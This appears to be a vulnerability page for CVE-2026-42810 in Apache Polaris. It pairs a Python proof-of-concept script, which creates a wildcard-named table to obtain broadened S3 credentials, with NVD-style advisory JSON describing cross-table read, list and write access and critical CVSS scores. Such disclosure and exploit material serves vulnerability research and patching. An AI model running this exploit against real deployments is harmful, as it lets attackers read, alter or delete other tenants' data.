CVE-2026-42810

import requests import json # Exploit concept for CVE-2026-42810 # Attacker creates a table with a wildcard name to broaden S3 credentials. def exploit_polaris_s3_bypass(target_url, attacker_token): headers = { "Authorization": f"Bearer {attacker_token}", "Content-Type": "application/json" } # Step 1: Create a malicious table with a wildcard in the name # This attempts to match any table starting with 'f' malicious_table_name = "f*" namespace = "default" payload = { "name": malicious_table_name, "namespace": namespace, "properties": {} } print(f"[*] Attempting to create table '{namespace}.{malicious_table_name}'...") # Hypothetical API endpoint create_url = f"{target_url}/api/management/v1/namespaces/{namespace}/tables" try: response = requests.post(create_url, headers=headers, json=payload) if response.status_code == 200 or response.status_code == 201: print("[+] Malicious table created successfully.") else: print(f"[-] Failed to create table: {response.text}") return except Exception as e: print(f"[-] Error creating table: {e}") return # Step 2: Request temporary S3 credentials for the malicious table print(f"[*] Requesting S3 credentials for '{namespace}.{malicious_table_name}'...") creds_url = f"{target_url}/api/iceberg/v1/{namespace}/tables/{malicious_table_name}/s3-credentials" try: creds_response = requests.get(creds_url, headers=headers) if creds_response.status_code == 200: creds = creds_response.json() print("[+] S3 Credentials received:") print(json.dumps(creds, indent=2)) print("[!] The 'Resource' or 'Condition' field likely contains a wildcard (e.g., arn:aws:s3:::bucket/f*/*)") print("[!] Using these credentials, an attacker can access data for tables like 'foo', 'food', etc.") else: print(f"[-] Failed to get credentials: {creds_response.text}") except Exception as e: print(f"[-] Error getting credentials: {e}") if __name__ == "__main__": # Replace with actual target and token exploit_polaris_s3_bypass("http://localhost:8080", "ATTACKER_JWT_TOKEN")

{"cve": {"id": "CVE-2026-42810", "sourceIdentifier": "[email protected]", "published": "2026-05-04T17:16:26.493", "lastModified": "2026-05-12T13:28:53.393", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Apache Polaris accepts literal `*` characters in namespace and table names. When it\nlater builds temporary S3 access policies for delegated table access, those\nsame characters appear to be reused unescaped in S3 IAM resource patterns\nand\n`s3:prefix` conditions.\n\n\n\nIn S3 IAM policy matching, `*` is treated as a wildcard rather than as\nordinary text. That means temporary credentials issued for one crafted table\ncan match the storage path of a different table.\n\n\n\nIn private testing against Polaris 1.4.0 using Polaris' AWS S3 temporary-\ncredential path on both MinIO and real AWS S3, credentials returned for\ncrafted tables such as `f*.t1`, `f*.*`, `*.*`, and `foo.*` could reach other\ntables' S3 locations.\n\n\nThe confirmed behavior includes:\n\n\n- reading another table's metadata control file ([Iceberg metadata JSON]);\n\n- listing another table's exact S3 table prefix ([table prefix]);\n\n- and, when write delegation was returned for the crafted table, creating\nand\ndeleting an object under another table's exact S3 table prefix.\n\n\n\nA control case using ordinary different names did not allow the same\ncross-table access.\n\n\n\nA least-privilege AWS S3 variant was also confirmed in which the attacker\nprincipal had no Polaris permissions on the victim table and only the\nminimal permissions required to create and use a crafted wildcard table\n(namespace-scoped `TABLE_CREATE` and `TABLE_WRITE_DATA` on `*`). In that\nsetup, direct Polaris access to `foo.t1` remained forbidden, but the\nattacker\ncould still create and load `*.*`, receive delegated S3 credentials, and use\nthose credentials to list, read, create, and delete objects under `foo.t1`.\n\n\n\nIn Iceberg, the metadata JSON file is a control file: it tells readers which\ndata files belong to the table, which snapshots exist, and which table\nversion\nto read. So unauthorized access to it is already a meaningful\nconfidentiality\nproblem. The confirmed write-capable variant means the issue is not limited\nto\ndisclosure."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-116"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:polaris:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.1", "matchCriteriaId": "D5093587-E178-48D3-A30B-04433BC6D047"}]}]}], "references": [{"url": "https://lists.apache.org/thread/gg3qq9sqg4hdjmprqy46p40xmln61dm9", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/02/11", "source": "af854a3a-2127-422 ... (truncated)